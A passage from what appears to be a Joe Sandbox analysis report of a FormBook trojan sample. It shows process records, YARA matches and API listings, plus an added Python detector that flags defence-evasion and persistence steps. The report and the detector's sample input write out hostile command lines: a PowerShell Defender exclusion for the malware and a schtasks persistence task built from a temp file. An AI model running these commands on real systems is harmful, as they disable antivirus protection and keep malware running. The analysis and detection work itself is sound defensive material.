                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
                                              Imagebase:0xc30000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:03:32:59
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Imagebase:0x410000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 34%, ReversingLabs
                                              • Detection: 32%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:03:33:01
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff693ab0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"
                                              Imagebase:0xe60000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x260000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:14
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x230000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:15
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x630000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:16
                                              Start time:03:33:07
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:17
                                              Start time:03:33:09
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\reg.exe"
                                              Imagebase:0xa0000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:19
                                              Start time:03:33:14
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:20
                                              Start time:03:33:19
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\reg.exe"
                                              Imagebase:0xa0000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              Target ID:23
                                              Start time:03:33:22
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              Target ID:24
                                              Start time:03:33:34
                                              Start date:08/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true
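
The process records above carry the whole chain in their command lines: PowerShell adds a Defender exclusion for the sample and for the dropped copy, schtasks.exe registers a task from an XML file in the user's Temp directory, and a byte-identical copy of the sample (same MD5) runs from AppData\Roaming under a new name before the payload is injected into reg.exe. As an added example, not part of the Joe Sandbox report, the Python below parses records in the report's own Key:Value layout and flags those three steps. The sample input is a constructed, trimmed copy of the records above; treating Target ID 0 as the submitted sample follows the 00000000 prefix on the report's memory-dump file names. The first two rule names mirror the report's signature titles, while the same-MD5 re-execution check and the temp-directory list are this example's own choices.

```python
"""Flag the defence-evasion and persistence steps visible in Joe Sandbox process
records: a Defender exclusion added through PowerShell, a scheduled task
registered from an XML file in a temp directory, and the submitted sample
running again from a second path under a new name (same MD5)."""
import re
from dataclasses import dataclass

# Constructed sample input: a trimmed copy of the "Target ID" records above, in
# the report's own "Key:Value" layout. Target ID 0 is the submitted sample.
SAMPLE_RECORDS = r"""
Target ID:0
Path:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
Commandline:"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A

Target ID:2
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC

Target ID:6
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:9
Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
Commandline:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A

Target ID:24
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
"""


@dataclass
class Proc:
    target_id: int
    path: str
    cmdline: str
    md5: str  # normalised to lower case so copies compare equal


def parse_records(text: str) -> list[Proc]:
    """Split the report text on blank lines and keep the four fields the checks
    need. Keys have no space after the colon and values contain 'C:', so split
    each line on its first ':' only."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if "Target ID" in fields:
            procs.append(Proc(int(fields["Target ID"]), fields.get("Path", ""),
                              fields.get("Commandline", ""),
                              fields.get("MD5 hash", "").lower()))
    return procs


# The argument may be quoted (group 1) or bare (group 2).
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_XML_RE = re.compile(r'/Create\b.*?/XML\s+(?:"([^"]+)"|(\S+))', re.I)
# Assumed set of temp locations for the scheduled-task check (example's choice).
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def detect(procs: list[Proc]) -> list[dict]:
    """Return one finding per matching process. The first two rule names mirror
    the report's own signature titles; the third is this example's own check."""
    findings = []
    sample = next((p for p in procs if p.target_id == 0), None)
    for p in procs:
        m = EXCLUSION_RE.search(p.cmdline)
        if m:
            findings.append({"target": p.target_id,
                             "rule": "Adds a directory exclusion to Windows Defender",
                             "detail": m.group(1) or m.group(2)})
        m = TASK_XML_RE.search(p.cmdline)
        if m:
            xml = m.group(1) or m.group(2)
            if any(d in xml.lower() for d in TEMP_DIRS):
                findings.append({"target": p.target_id,
                                 "rule": "Scheduled temp file as task from temp location",
                                 "detail": xml})
        # Same bytes as the submitted sample, started from a different path:
        # the dropped persistence copy.
        if (sample is not None and p is not sample and p.md5 == sample.md5
                and p.path.lower() != sample.path.lower()):
            findings.append({"target": p.target_id,
                             "rule": "Submitted sample re-executed from a second path (same MD5)",
                             "detail": p.path})
    return findings


def run_on_sample() -> list[dict]:
    return detect(parse_records(SAMPLE_RECORDS))


if __name__ == "__main__":
    for f in run_on_sample():
        print(f"target {f['target']:>2}: {f['rule']} -> {f['detail']}")
```

On the constructed records this yields three findings, for Target IDs 2, 6 and 9. The same checks translate directly to endpoint telemetry (process-creation events carrying the command line and image hash); the Defender exclusion is the highest-value one to alert on, since legitimate software rarely excludes a single executable sitting on a user's Desktop.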


                                                Execution Graph

                                                Execution Coverage:8.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:97
                                                Total number of Limit Nodes:7
                                                execution_graph (node and edge listing omitted; only the API-calling nodes are recoverable): CreateActCtxA at 0xcd5918 (reached via 0xcd44b4), GetModuleHandleW at 0xcdafe0, LoadLibraryExW at 0xcdb220 (reached via 0xcda130), GetCurrentProcess at 0xcdd086 and 0xcdd115, GetCurrentThread at 0xcdd0d8, GetCurrentThreadId at 0xcdd173, DuplicateHandle at 0xcdd690, PostMessageW at 0x70622b0 and 0x70622b8.
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 547fe2c760792097f057b41ff75e6ddeb249286d7ebde9f7cf87bb0c089f8cda
                                                • Instruction ID: 912bcfd36f570a25b0b6cb1e0dc3db525a14d5ffc608999e3c69fb6a4ea15924
                                                • Opcode Fuzzy Hash: 547fe2c760792097f057b41ff75e6ddeb249286d7ebde9f7cf87bb0c089f8cda
                                                • Instruction Fuzzy Hash: E8213BB8819218CFCB60CF64C9587FCBBF8AB4A314F0462D6941EA3291D7359AC5CF00

                                                Control-flow Graph

                                                control_flow_graph (edge listing omitted; graph legend: Executed / Not Executed): function starting at 0xcdd031, basic blocks 0xcdd031 to 0xcdd20d; calls in block order: GetCurrentProcess (block 0xcdd031), GetCurrentThread (0xcdd0d8), GetCurrentProcess (0xcdd115), call 0xcdd618 (0xcdd152), GetCurrentThreadId (0xcdd173).
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD0BE
                                                • GetCurrentThread.KERNEL32 ref: 00CDD0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD138
                                                • GetCurrentThreadId.KERNEL32 ref: 00CDD191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e754714fd34220ef103f846f87cb7767e6e26459f51b4b37752b412c66907729
                                                • Instruction ID: be5d5d8b68242cb6884cc1fb3bc2562839818ff7fd08bab5395ad11291068b10
                                                • Opcode Fuzzy Hash: e754714fd34220ef103f846f87cb7767e6e26459f51b4b37752b412c66907729
                                                • Instruction Fuzzy Hash: EC5187B0D00249CFDB04DFA9C548B9EBBF1EF88314F20845AE019A73A1D734A988CF65

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD0BE
                                                • GetCurrentThread.KERNEL32 ref: 00CDD0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00CDD138
                                                • GetCurrentThreadId.KERNEL32 ref: 00CDD191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 528786e31734a73f416c70f81d51adddf3e4dc1ba3c943f1f601f2ac0c1d8e31
                                                • Instruction ID: 8d63c02b0f30ce62b4a63ed8ef202bbf55d34850b3796ed11c3626bd037dee98
                                                • Opcode Fuzzy Hash: 528786e31734a73f416c70f81d51adddf3e4dc1ba3c943f1f601f2ac0c1d8e31
                                                • Instruction Fuzzy Hash: 925155B0D002098FDB14DFA9D548BEEBBF1EF88314F20845AE519A7360D774A988CF65

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDAFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 79f6ae9accf1f8a2bac123db2bbb11a014a24c0c357f42a4382deb1e0cdb4797
                                                • Instruction ID: dd54b45436a8219a3816f8a3e5f37ace2576c0db729329530859c9af9d9b57be
                                                • Opcode Fuzzy Hash: 79f6ae9accf1f8a2bac123db2bbb11a014a24c0c357f42a4382deb1e0cdb4797
                                                • Instruction Fuzzy Hash: E0814370A00B058FDB24DF2AD44579ABBF1BF88304F008A2ED59AD7B50D775EA49CB91

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CD59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 454e4e4aca79f2cb2d638e2a09ee041fe89fc0c4b1070cc37aa17420857a049f
                                                • Instruction ID: c1954ee911789e4a0bd271a6eec48acf129721026207055ea67c0ae6b5d7b91e
                                                • Opcode Fuzzy Hash: 454e4e4aca79f2cb2d638e2a09ee041fe89fc0c4b1070cc37aa17420857a049f
                                                • Instruction Fuzzy Hash: 4241E2B0C00719CFDB24CFA9C884BDEBBB5BF49304F24816AD419AB255DB75694ACF90

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00CD59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: bac4b53b930cc9f78a6e7d757ab6a088bccf4948a0ac3acb866a9d20dfdb3714
                                                • Instruction ID: f9b0188db01ced1eb7d10aa4503abe3070fd5d4fef04893f470afac3127f3256
                                                • Opcode Fuzzy Hash: bac4b53b930cc9f78a6e7d757ab6a088bccf4948a0ac3acb866a9d20dfdb3714
                                                • Instruction Fuzzy Hash: 4B41DFB0C0061DCFDB24CFAAC984B9EBBB5BF48304F24816AD509AB255DB756946CF90

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CDD717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6458254b24c19075776153c623ed0424a6286e5688c73a386c63994a48d91de6
                                                • Instruction ID: 0e63b0c44f35e18a53ad864f35257a600c6424a12eba0df0c1d4d813d4c47c9a
                                                • Opcode Fuzzy Hash: 6458254b24c19075776153c623ed0424a6286e5688c73a386c63994a48d91de6
                                                • Instruction Fuzzy Hash: 7C21E2B5D00259DFDB10CFAAD984ADEBBF5EB48324F14801AE919B3310D374A940CFA4

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CDD717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 2693e528e1a76ebb0f99448256675238f59eef4a16456e6ba9203ad945002db4
                                                • Instruction ID: 7ad302283ecd9ae82b3e42d54b40134ac3f81d43e91cbb2260a7acdd02188faa
                                                • Opcode Fuzzy Hash: 2693e528e1a76ebb0f99448256675238f59eef4a16456e6ba9203ad945002db4
                                                • Instruction Fuzzy Hash: 0D21E2B5D002489FDB10CFAAD984ADEFFF8EB48320F14801AE919A3310C374A940CFA4

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDB079,00000800,00000000,00000000), ref: 00CDB28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 33fb3472d9191c8e39d356c76b0722b814e369d00f662a134db183724bd31c74
                                                • Instruction ID: 05f76c11de40fe829551162101a40e810fbbfb38bf7b6634496b603355cfd3b3
                                                • Opcode Fuzzy Hash: 33fb3472d9191c8e39d356c76b0722b814e369d00f662a134db183724bd31c74
                                                • Instruction Fuzzy Hash: 5411E4B6900209DFDB14CF9AD444ADEFBF4EB48310F11852ED519A7350C375A945CFA5

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CDB079,00000800,00000000,00000000), ref: 00CDB28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f7373bed1f69b403f0cf180a08ddfe9f9a82233594e69398850ccb99c9590a0e
                                                • Instruction ID: 484dd5ecce6b493d4cc14312558cd43dc0adceec1b387c5572b518ce5efe1597
                                                • Opcode Fuzzy Hash: f7373bed1f69b403f0cf180a08ddfe9f9a82233594e69398850ccb99c9590a0e
                                                • Instruction Fuzzy Hash: 7E1126B6C00249CFCB14CF9AC444ADEFBF4EB88310F15852AD919A7310C375A945CFA4

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CDAFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697268377.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_cd0000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: bdae557b576eee1034eb04b7d68187d85931a310afcb233c36542ce9446572fb
                                                • Instruction ID: 3e5adedfa6c1fed86d3c13a36a71925d07b5972fa9a067f0e3e62362f026b3cd
                                                • Opcode Fuzzy Hash: bdae557b576eee1034eb04b7d68187d85931a310afcb233c36542ce9446572fb
                                                • Instruction Fuzzy Hash: 2E11E0B5C00249CFCB14CF9AC444ADEFBF4EB88324F10856AD969A7710D375AA45CFA5

                                                Control-flow Graph (graph image not reproduced)
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 07062315
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1723211453.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7060000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: c491785d17ee7ac2747da85678ad315435b4e92eea9b242d555ac597f4169ff6
                                                • Instruction ID: c7215e9ae9390a5a26baafb725647bef9daabcb4118986fe4538a0eaa82e97a2
